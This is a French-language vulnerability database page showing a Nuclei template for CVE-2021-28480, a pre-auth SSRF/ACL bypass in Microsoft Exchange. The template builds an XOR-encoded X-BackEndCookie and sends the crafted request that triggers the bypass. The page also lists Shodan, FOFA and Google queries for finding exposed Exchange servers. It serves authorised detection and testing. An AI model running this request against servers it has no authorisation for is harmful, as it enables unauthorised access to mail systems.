Aller au contenu
Appaloosa Scout
Sélection de la langue
fr en

Exploit matérialisé

CVE-2021-28480

CRITICAL

1 exploit(s) public(s) pour cette CVE, 1 matérialisé(s) avec leur code.

À des fins de recherche défensive uniquement. Ne testez que sur des systèmes que vous possédez ou pour lesquels vous détenez une autorisation écrite. L'accès non autorisé est illégal.
Nuclei critical Vérifié
Source

Microsoft Exchange - Pre-Auth SSRF / ACL Bypass (ProxyNotFound)

Par projectdiscovery

Comment tester cet exploit

Le template Nuclei EST le test : une règle de détection exécutable. Installez nuclei, puis lancez-le contre une cible que vous contrôlez.

nuclei -id CVE-2021-28480 -u https://your-target

Template yaml

id: CVE-2021-28480

info:
  name: Microsoft Exchange - Pre-Auth SSRF / ACL Bypass (ProxyNotFound)
  author: daffainfo
  severity: critical
  description: |
    Microsoft Exchange Server contains a remote code execution caused by improper input validation in the server component, letting remote attackers execute arbitrary code, exploit requires network access to the server.
  impact: |
    Attackers can execute arbitrary code remotely, potentially leading to full system compromise or data breach
  remediation: |
    Apply the latest security patches and updates provided by Microsoft for Exchange Server
  reference:
    - https://sec.vnpt.vn/2021/04/microsoft-exchange-from-deserialization-to-post-auth-rce-cve-2021-28482
    - https://hitcon.org/2021/agenda/279d7810-e619-4dc3-9113-b11bad5277ec/The%20Proxy%20Era%20of%20Microsoft%20Exchange%20Server.pdf
    - https://www.youtube.com/watch?v=vn4niT9XEIM
    - https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2021-28480
    - https://nvd.nist.gov/vuln/detail/cve-2021-28480
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-28480
    cwe-id: D-CWE-noinfo
    epss-score: 0.71425
    epss-percentile: 0.99367
    cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: microsoft
    product: exchange_server
    shodan-query:
      - http.favicon.hash:1768726119
      - http.title:"outlook"
      - cpe:"cpe:2.3:a:microsoft:exchange_server"
    fofa-query:
      - title="outlook"
      - icon_hash=1768726119
    google-query: intitle:"outlook"
  tags: cve,cve2021,ssrf,rce,exchange,microsoft

variables:
  email: '{{rand_base(5)}}@{{rand_base(5)}}.com'
  epoch: '{{unix_time()}}'
  date: '{{date_time("%Y-%M-%DT%H:%m:%s")}}'

flow: |
  http(1)
  let servername = template.servername;
  let epoch = template.epoch;
  let date = template.date;
  let str = "Server~x]@" + servername.toLowerCase() + ":444/owa/?a.a#~" + epoch + "~" + date;
  let result = "";

  for (let i = 0; i < str.length; i++) {
    let xorChar = str.charCodeAt(i) ^ 0xff;
    result += xorChar.toString(16).padStart(2, "0");
  }

  set("rawXor", result);
  http(2)

http:
  - raw:
      - |
        GET /owa/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(to_lower(header), "x-feserver")'
        condition: and
        internal: true

    extractors:
      - type: kval
        name: servername
        kval:
          - x_feserver
        internal: true

  - raw:
      - |
        GET /owa/calendar/{{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: X-BackEndCookie={{email}}={{base64(hex_decode(rawXor))}}
        X-AnchorMailbox: {{email}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "NT+AUTHORITY"
          - "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException"
        condition: and

      - type: status
        status:
          - 302
# digest: 4a0a004730450220715d9b791ebefebaf6736dd741a07a79d6405b31463d1d542f03b63524380cb5022100b4718507eb0906e5e9a4c062f9ab566f20901ed4834388a476791e53c2b788e2:922c64590222798bb761d5b6d8e72950